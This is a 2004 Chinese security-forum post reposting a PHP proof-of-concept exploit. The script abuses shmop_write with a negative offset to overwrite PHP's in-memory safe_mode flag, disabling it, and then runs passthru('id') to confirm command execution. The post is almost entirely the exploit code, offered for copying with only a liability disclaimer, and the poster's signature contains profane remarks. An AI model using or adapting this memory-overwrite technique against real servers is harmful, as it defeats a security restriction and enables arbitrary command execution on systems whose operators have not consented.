‹‹ 上一主题 | 下一主题 ››
发新话题
打印

PHP Shmop Write of Arbitrary Memory Exploit

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9861 
精华
771 
积分
40900 
阅读权限
200 
性别
男 
在线时间
3984 小时 
注册时间
2004-7-4 
最后登录
2008-11-18 
楼主 发表于 2004-12-21 14:09  只看该作者

PHP Shmop Write of Arbitrary Memory Exploit

文章作者:shm bytes
复制内容到剪贴板
代码:
<?
/*
Php Safe_mode Bypass Proof of concept.

Copyright 2004 Stefano Di Paola stefano.dipaola[at]wisec.it

Disclaimer: The author is not responsible of any damage this script can cause
-SECU
*/

$shm_id = shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) {
echo "Couldn&#39;t create shared memory segment\n";
die;
}

// $data="\x01";
// the new value for safe_mode
$data="\x00";

// this (-3842685) is my offset to reach core_globals.safe_mode
// taken with gdb. (0x40688d83)
$offset=-3842685;
// Lets write the new value at our offset.
$shm_bytes_written = shmop_write($shm_id, $data, $offset );
if ($shm_bytes_written != strlen($data)) {
echo "Couldn&#39;t write the entire length of data\n";
}

//Now lets delete the block and close the shared memory segment
if (!shmop_delete($shm_id)) {
echo "Couldn&#39;t mark shared memory block for deletion.";
}
shmop_close($shm_id);

// Let&#39;s try if safe mode has been set to off
echo passthru("id");
dl("shmop.so");
?>
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题